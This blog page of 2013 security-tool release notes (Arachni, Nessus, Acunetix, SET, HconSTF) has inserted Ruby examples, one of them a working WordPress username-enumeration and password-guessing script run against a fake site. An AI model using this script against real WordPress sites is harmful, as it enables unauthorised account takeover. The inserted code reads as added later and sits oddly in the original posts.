Monday, April 29, 2013

UPDATE ARACHNI V0.4.2 - WEB APPLICATION SECURITY SCANNER FRAMEWORK

Arachni is an Open Source, feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

It is smart: it trains itself by learning from the HTTP responses it receives during the audit, and it performs meta-analysis over a number of factors to assess the trustworthiness of results and identify false positives.

It is versatile enough to cover a great deal of use cases, ranging from a simple command line scanner utility, to a global high performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform.


Features
  • Cookie-jar/cookie-string support.
  • Custom header support.
  • SSL support.
  • User Agent spoofing.
  • Proxy support for SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0.
  • Proxy authentication.
  • Site authentication (automated form-based, cookie-jar, Basic/Digest, NTLM and others).
  • Automatic log-out detection and re-login during the audit (when the initial login was performed via the AutoLogin plugin).
  • Custom 404 page detection.
  • UI abstraction:
    • Command-line interface.
    • Web user interface.
  • Pause/resume functionality.
  • High-performance asynchronous HTTP requests.
Major improvements with 0.4.2

  Users

    Regular users can enjoy:
    • The ability to easily perform and manage scans via the brand new, Rails-based, simple, intuitive and beautiful web user interface — I’m overselling it a bit out of excitement.
    • Much reduced RAM usage.
    • More fluid and smoother progress %.
    • Issue remarks – providing extra context to logged issues and helping you determine the nature, variation and special circumstances that may apply.
    • More resilient stance towards non-responsive servers.
    • Much improved profiling and detection of custom 404 responses.
    • Improved payloads for Windows machines for path traversal and OS command injection.
    • The ability to exclude pages from the scan based on content.

  Developers

    Oh you devs out there controlling Arachni via RPC are gonna love these:
    • Default serialization changed to Marshal, which translates to much faster and less bandwidth-consuming RPC calls.
      • YAML serialization is still supported and is an automatic fallback; YAML requests will still elicit a YAML response. Careful though, the engine has been changed to Psych, which has been the Ruby default for a while now.
    • A bunch of convenience methods have been added to Arachni::RPC::Server::Instance, allowing you to perform and control scans much more easily than before.
    • More data returned for logged issues during runtime.
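The serialization negotiation described in the Marshal/YAML bullets above, as an added example in Ruby (this is not Arachni's RPC code; the `RpcCodec` module, its `HANDLERS` table and the request shape `{'call' => ..., 'args' => [...]}` are assumptions made for the illustration): sniff whether a request arrived as Marshal or YAML, answer in the same format, and keep the two deserializers' risk profiles in view. `Marshal.load` instantiates whatever classes the sender names and must only ever see bytes from an authenticated peer; the YAML side goes through Psych's `safe_load`, which refuses arbitrary object tags.

```ruby
require 'yaml'

# Added example, not Arachni's own RPC layer: a minimal codec with Marshal as
# the default wire format and YAML as an automatic fallback, replying in
# whichever format the request used.
module RpcCodec
  # Every Marshal.dump output starts with the format version bytes (4.8).
  MARSHAL_MAGIC = [Marshal::MAJOR_VERSION, Marshal::MINOR_VERSION].pack('CC').b

  def self.format_of(bytes)
    bytes.b.start_with?(MARSHAL_MAGIC) ? :marshal : :yaml
  end

  # Marshal.load will build whatever classes the sender names, so this path is
  # only acceptable when the transport already authenticates the peer. The
  # YAML path uses Psych's safe_load, which rejects arbitrary object tags.
  def self.decode(bytes)
    fmt = format_of(bytes)
    obj = fmt == :marshal ? Marshal.load(bytes) : YAML.safe_load(bytes)
    [obj, fmt]
  end

  def self.encode(obj, fmt)
    fmt == :marshal ? Marshal.dump(obj) : YAML.dump(obj)
  end

  # Hypothetical service table for the demo; request hashes look like
  # {'call' => 'add', 'args' => [1, 2, 3]}.
  HANDLERS = {
    'add'    => ->(args) { args.sum },
    'concat' => ->(args) { args.join }
  }.freeze

  # Dispatch one request and answer in the same format it arrived in.
  def self.respond(request_bytes)
    req, fmt = decode(request_bytes)
    handler = HANDLERS[req['call']]
    reply = if handler
              { 'result' => handler.call(req['args']) }
            else
              { 'error' => "unknown call #{req['call']}" }
            end
    encode(reply, fmt)
  end
end
```

`RpcCodec.respond(Marshal.dump('call' => 'add', 'args' => [1, 2, 3]))` returns a Marshal blob that decodes to `{'result' => 6}`; hand it `YAML.dump` of the same hash and the reply comes back as YAML text instead.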

  Service providers

    Well, you get to enjoy all of the above but at a higher, more abstract level:
    • Significantly reduced RAM consumption.
    • Significantly reduced bandwidth and CPU usage for RPC calls.
    • Improved progress information for statistics, issues and progress %.
    That is: fewer costs, happier devs and happier clients.
Download

  Linux

  You can download self-contained packages for Linux for the following architectures:
  • Linux x86 32-bit (SHA1)
  • Linux x86 64-bit (SHA1)

    If you get a GLIBC error please update your system.

Wednesday, April 24, 2013

Nessus 5.2 Released

Nessus® is the industry’s most widely-deployed vulnerability and configuration assessment product. Nessus features high-speed discovery, configuration auditing, asset profiling, sensitive data discovery, patch management integration, and vulnerability analysis of your security posture. Fueled by Nessus ProfessionalFeed®, a continuously-updated library with more than 50,000 individual vulnerability and configuration checks, and supported by an expert vulnerability research team, Nessus delivers accuracy to the marketplace. Nessus scales to serve the largest organizations and is quick and easy to deploy.

Nessus Scanning Capabilities:
• Accurate, high-speed asset discovery
• Compliance auditing: FFIEC, FISMA, CyberScope Reporting Protocol, GLBA, HIPAA/HITECH, NERC, PCI, SOX
• Configuration auditing: CERT, CIS, COBIT/ITIL, DISA STIGs, FDCC, IBM iSeries, ISO, NIST, NSA
• Patch auditing: Includes patch management integration with IBM® TEM for Patch
Management, Microsoft® SCCM and WSUS, Red Hat® Network Satellite Server, and
VMware® Go
• Control systems auditing: SCADA systems, devices, and applications
• Sensitive content auditing: PII (credit card numbers, SSNs) and intellectual property
• Mobile device auditing: Lists iOS, Android™, and Windows Phone 7 devices accessing the
network and detects mobile vulnerabilities
• Vulnerability scanning for:
–– Network devices: Juniper, Cisco, firewalls, printers, and more
–– Virtual hosts: VMware ESX, ESXi, vSphere, vCenter
–– Operating systems: Windows, Mac, Linux, Solaris, BSD, Cisco iOS, IBM iSeries
–– Databases: Oracle, SQL Server, MySQL, DB2, Informix/DRDA, PostgreSQL
–– Web applications: Web servers, web services, OWASP vulnerabilities
–– Compromise detection: Viruses, malware, backdoors, hosts communicating with botnet-infected systems, web services linking to malicious content
• Credentialed scanning detects local vulnerabilities and conditions
• Uncredentialed network-based scanning finds new hosts and vulnerabilities
• Certified SCAP vulnerability scanner

Tenable has announced a new release of the Nessus vulnerability scanner! This is a major release (moving from 5.0.3 to 5.2.0) which provides several new features and
enhancements, including:
  • IPv6 is now supported on all platforms (including Windows)
  • Nessus server support for Windows 8 and Windows 2012
  • Add attachments within scan result reports
  • Mac OS X preference pane
  • Digitally-signed Nessus RPM packages for supporting distributions
  • Smaller memory footprint and reduced disk space usage
  • Faster, more responsive web interface (uses less bandwidth)
  • No longer need to visit the Tenable website for an activation code!

Thursday, April 18, 2013

Acunetix Web Vulnerability Scanner v8 build 20130416 with New WordPress Checks


This new release of Acunetix Web Vulnerability Scanner version 8, build 20130416, includes new and improved vulnerability checks targeting WordPress installations, web applications hosted on Amazon S3, and various other web applications.

New Functionality

  • Added a test that enumerates valid WordPress usernames using various techniques.
  • Added a test for weak WordPress passwords for the usernames identified during the scan.
  • Added a test that identifies common WordPress plugins. For each plugin identified, Acunetix WVS will try to enumerate the plugin name, short description, installed version and latest version of the plugin. This information is shown in a Knowledge Base item.
  • Added a test that identifies Amazon S3 public buckets.
  • Added a test for the security hotfix for ColdFusion 10, 9.0.2, 9.0.1 and 9.0 for Windows, Macintosh and UNIX (Adobe Vulnerability ID: APSB13-10; CVE-2013-1387, CVE-2013-1388).
  • Added a test looking for the Apache Tomcat SessionExample servlet, which can allow session manipulation.
  • Added a test for Drupal Views Module Information Disclosure Vulnerability.
  • Added a test for Gallery v3.0.4 Remote Code Execution.
  • Added a test for Jenkins Dashboard (http://jenkins-ci.org/).
  • Added a test for Roundcube Webmail Security updates 0.8.6 and 0.7.3.
  • Added a test for WordPress 3.4.2 Cross Site Request Forgery.
  • Added a test looking for a Cross-Site Scripting vulnerability in older versions of jQuery which affected Drupal amongst others.
  • Added a test looking for SQL Injection in Symphony v2.3.1 (CVE-2013-2599)
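The WordPress username enumeration and weak-password items above, as an added example in Ruby (this is not Acunetix code, and the release notes do not say which techniques the scanner uses): two long-standing enumeration techniques, the `?author=N` redirect and the wp-login.php error-message oracle, followed by a short weak-password check for each user found. The checks are written against an injectable HTTP client (`http.call(method, url, body)` returning `[status, headers, body]`), and `FAKE_WP`, `FAKE_CREDS`, the host `wp.example` and the cookie value are constructed stand-ins so that the whole thing runs offline; the exact login error wording is an assumption that varies by WordPress version and locale.

```ruby
require 'uri'

# Added example, not Acunetix's own checks. Every request goes through an
# injectable client so the logic can run against a constructed WordPress
# stand-in below instead of a live site.
module WpUserEnum
  # Technique 1: /?author=N redirects to /author/<user_nicename>/ when pretty
  # permalinks are on; the nicename usually equals the login name.
  AUTHOR_REDIRECT = %r{/author/([^/?#]+)}

  def self.from_author_ids(http, base, ids = 1..10)
    ids.each_with_object({}) do |id, found|
      status, headers, _body = http.call(:get, "#{base}/?author=#{id}", nil)
      next unless [301, 302].include?(status)
      m = AUTHOR_REDIRECT.match(headers['Location'].to_s)
      found[id] = URI.decode_www_form_component(m[1]) if m
    end
  end

  # Technique 2: wp-login.php of this era answers "Invalid username." for an
  # unknown user and a different message for a wrong password on a known one.
  # The exact wording is an assumption; it differs across versions and locales.
  def self.valid_login?(http, base, user)
    _status, _headers, body = http.call(:post, "#{base}/wp-login.php",
                                        URI.encode_www_form('log' => user, 'pwd' => 'x'))
    !body.include?('Invalid username')
  end

  # Follow-up: try a short candidate list per user. A successful login answers
  # with a redirect that sets a wordpress_logged_in_* cookie.
  def self.weak_passwords(http, base, users, candidates)
    users.each_with_object({}) do |user, hits|
      candidates.each do |pwd|
        status, headers, _body = http.call(:post, "#{base}/wp-login.php",
                                           URI.encode_www_form('log' => user, 'pwd' => pwd))
        next unless status == 302 && headers['Set-Cookie'].to_s.include?('wordpress_logged_in_')
        hits[user] = pwd
        break
      end
    end
  end
end

# Constructed stand-in for a WordPress site (not a real host): two users, one
# with a weak password. Only the behaviour the checks rely on is faked.
FAKE_CREDS = { 'admin' => 'password', 'editor' => 'Xq7!vR2p' }.freeze

FAKE_WP = lambda do |method, url, body|
  uri = URI(url)
  if method == :get && (m = /\Aauthor=(\d+)\z/.match(uri.query.to_s))
    id = m[1].to_i
    name = id >= 1 ? FAKE_CREDS.keys[id - 1] : nil
    return [404, {}, 'Not Found'] unless name
    [301, { 'Location' => "#{uri.scheme}://#{uri.host}/author/#{name}/" }, '']
  elsif method == :post && uri.path == '/wp-login.php'
    form = URI.decode_www_form(body.to_s).to_h
    user, pwd = form['log'], form['pwd']
    if FAKE_CREDS[user] == pwd
      [302, { 'Location' => "#{uri.scheme}://#{uri.host}/wp-admin/",
              'Set-Cookie' => 'wordpress_logged_in_1a2b=fake; path=/; HttpOnly' }, '']
    elsif FAKE_CREDS.key?(user)
      [200, {}, %(<div id="login_error">The password you entered for the username #{user} is incorrect.</div>)]
    else
      [200, {}, %(<div id="login_error">Invalid username.</div>)]
    end
  else
    [404, {}, 'Not Found']
  end
end
```

Against the stand-in, `WpUserEnum.from_author_ids(FAKE_WP, 'http://wp.example', 1..5)` yields `{1 => 'admin', 2 => 'editor'}`, and `weak_passwords` over a three-word list recovers only the admin account's password, which is the behaviour the scanner's "for the usernames identified during the scan" wording describes. Against a live target the same code should be rate-limited and run only with authorisation, since the login oracle and the password check both hit wp-login.php.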

Improvements

  • Client Script Analyser: Optimized script source retrieval (modernizr-2.5.3.js)
  • Improved XSS in URI script to test for Apache Tomcat Path Parameters.
  • Improved WordPress Pingback Scanner test.
  • Improved Blind SQL Injection script.
  • Improved Crossdomain_XML script.
  • Improved Directory Traversal script.
  • Improved Error_Message script.
  • Improved URL redirection script.
  • Improved XSS testing script.
  • The number of input schemes has been reduced for known applications, improving scan performance for such web applications.

Bug Fixes

  • Fixed an issue which caused false positives to occasionally show up in the report for Scheduled Scans.
  • Better handling for META http-equiv="refresh" tags by the Crawler.
  • Fixed an issue in error_messages_helpers.inc script.
  • Fixed a minor bug in the Scheduler UI (Bug ID: 364)
  • North and South Korea are now correctly identified in the Product Activation Wizard.
  • Fixed an issue where scans were sporadically entering a loop when scanning certain sites using a login sequence with the CSRF check enabled.
  • Fixed an issue where WebApps scripts were being invoked even though they were excluded in the scanning profile.

How to Upgrade

When you start Acunetix WVS 8, you will be notified that a new build is available to download. Navigate to the General > Program Updates node in the Tools explorer, click on Download and Install the new build.

Source-
http://www.acunetix.com/blog/releases/acunetix-wvs-v8-build-20130416/

Wednesday, April 17, 2013

The Social-Engineer Toolkit (SET) Version 5.0 “The Wild West” released


TrustedSec is proud to announce the release of the Social-Engineer Toolkit (SET) v5.0, codename The Wild West. This version is the culmination of six months of development, bug squashing and user feedback. New in this version is a completely redesigned multiprocessing web server that handles non-RFC-compliant HTTP traffic: the built-in SET web server would on occasion crash when receiving unexpected characters, while the new one is stable and significantly faster. This version is also Kali Linux (FHS) compliant: all runtime data has been moved out of src/program_junk and into your ~/.set home directory.
In addition to the FHS restructuring of SET, there are significant performance and stability updates. For example, previously, once you had launched an attack you had to exit SET completely and relaunch it before running another; the dynamic importing has been changed to fix this and to improve module reuse.
For a full list of changes, the changelog can be found below:
~~~~~~~~~~~~~~~~
version 5.0
~~~~~~~~~~~~~~~~
* fixed a bug that would cause tabnabbing to throw an exception around check_options
* added setcore modules into tabnabbing to allow centralized routines
* fixed a bug that would cause webjacking to throw an exception around check_options
* added git clean -fd prior to set update, this will force a clean when pulling the latest files
* fixed a bug that would cause a system not setup properly when installing in setup.py
* fixed a bug where start_dns() upon launch would cause errors on certain systems
* added installation script for putting SET into /usr/bin and /usr/share for FSH compliant installer
* added set-update to the installation path, can type that anywhere now
* added set-automate to the list to be typed in anywhere
* fixed a bug that would cause the java applet method to not work a second time in use (reload)
* rewrote MASSIVE amounts of code to no longer use src/program_junk for storage of applications, it’s now all under ~/.set
* fixed an os.chdir issue when using it to spawn a web server during java applet, moved to multiprocessing instead of threading.Thread
* fixed a bug that caused credential harvester to throw an exception with the new ~/.set directory structure
* centralized setdir into the main repository to handle it through there and to call the ~/.set directory
* added additional passwords to wordlist.txt used for fast-track mssql brute forcing
* fixed a mssql access bug that would cause fast-track to error out if unspecified IP was added
* removed the pymssql check from the initial SET start and onto Fast-Track since it’s only used there
* turned java repeater to ON by default, much better success rate in SE pentesting
* rewrote large portions of payloadgen to incorporate the changes to the new ~/.set path variables
* added a new file structure to launch set called se-toolkit. The set executable is now deprecated and should no longer be used – to launch set just type ./se-toolkit
* updated the setup.py installation to be more robust when performing installations (windows, etc.)
* moved all of the reporting structures within SET to the new ~/.set directory
* added a checkup routine in set and se-toolkit to check for the reports directory
* fixed a bug that would cause multi powershell injection to trigger even when using the powershell menu, it will just generate one now
* fixed an issue that could cause powershell injection to not work properly using the fast patch method
* fixed an issue that would cause definepath to not be specified when using the SE Toolkit Interactive shell
* fixed relative path issues in sccm_main and powershell teensy vectors to point to new .set directory
* fixed an issue that would cause the SE toolkit to hang on a weird bug when importing binascii – moved binascii to main import above and no longer hung
* fixed a before assignment error when using the windows debug conversion in the fast-track mssql menu (meta_path reference)
* changed reports directory within the teensy side to move to ~/.set/reports
* moved the report_generator in harvester to pull and report on the new ~/.set reports structure
* fixed an issue where webjacking would not post properly on certain websites (index2.html conflict issue)
* added the Metasploit MS13-009-IE SLayoutrun Use After Free Exploit to the Metasploit Browser Exploit attacks
* fixed a parsing issue with the JMX bean exploit in the SET menu text from appearing to be on one line
* added a new description on setting up sendmail for Kali Linux
* added a check for multi powershell injection and check for solo instances through powershell teensy and not to generate a ton
* changed the email handler from control-c to END instead. Control-C will break multiprocessing within src.html.spawn and this is the proper way to do it
* cleaned up setcore with old code and optimized other areas of the code base
* reduced the description of the allports payload when selecting in web attack method
* added a completely new and redesigned multi threaded and multiprocessing web server – should be significantly faster with less bugs and crashing when handling non-RFC compliant HTTP requests
* optimized applet load time to be much more efficient when being loaded into the web attack vector (about 4 seconds improvement)
* rewrote exception handler for the new web server to check to see if anything is running on port 80 when starting
* turned java repeater to on by default – more stable and tested on multiple platforms
* fixed an issue that would cause the java applet web cloner to fail upon running it twice – added reload(module) option to fix the bug
* fixed an issue that caused powershell.prep to not load if used twice
* fixed an import error when using powershell injection through the main menu
* changed initial set menu in powershell to be the standard setprompt
* changed the default port to 443 on powershell delivery in the set option number 10
* fixed an issue that would cause the powershell injection to spawn on port 22 versus 443 as specified
* removed the man left in the middle attack – no longer in use, outdated and not maintained
* removed beautifulsoup as a dependency for SET due to the removal of man left in the middle
* added the ability to call the web server and stop it based on stop_server()


Monday, April 8, 2013

Hcon Security Testing Framework (HconSTF) v0.5 [Fire Base] - codename 'Prime' released


HconSTF is a browser-based security testing framework. As expected, this version of Hcon comes with enhanced features and more functionality, so let's take a glance at HconSTF v0.5.
HconSTF is semi-automated, but you still need your brain to work it out. It can be used in all kinds of security testing stages and has tools for conducting tasks like:
  • Web Penetration Testing
  • Web Exploits Development
  • Web Malware Analysis
  • Open Source Intelligence ( Cyber Spying & Doxing )
  • and much more with lots of hidden features
HconSTF v0.5 in Brief:-
  • Based on Firefox 17.0.1
  • Designed in Process based methodology
  • Small (40 MB packed, 80 MB extracted) and consumes less memory
  • More than 165 search plugins
  • New IDB 0.1 release integrated
  • Logging of each and every request
  • More new scanners for DOM XSS and reflected XSS
  • New reporting features such as note taking and URL logging for easy report making
  • Smart search box: select text and it is copied into the box; just change the search engine to search for it
  • Integrated Tor, AdvOR, I2P and more proxies
  • New Greasemonkey scripts (18 scripts)
Download HconSTF v0.5: portable build (no installation needed; run it from a USB drive or any memory card). Platform: Windows XP, Vista and 7, both 32-bit and 64-bit.
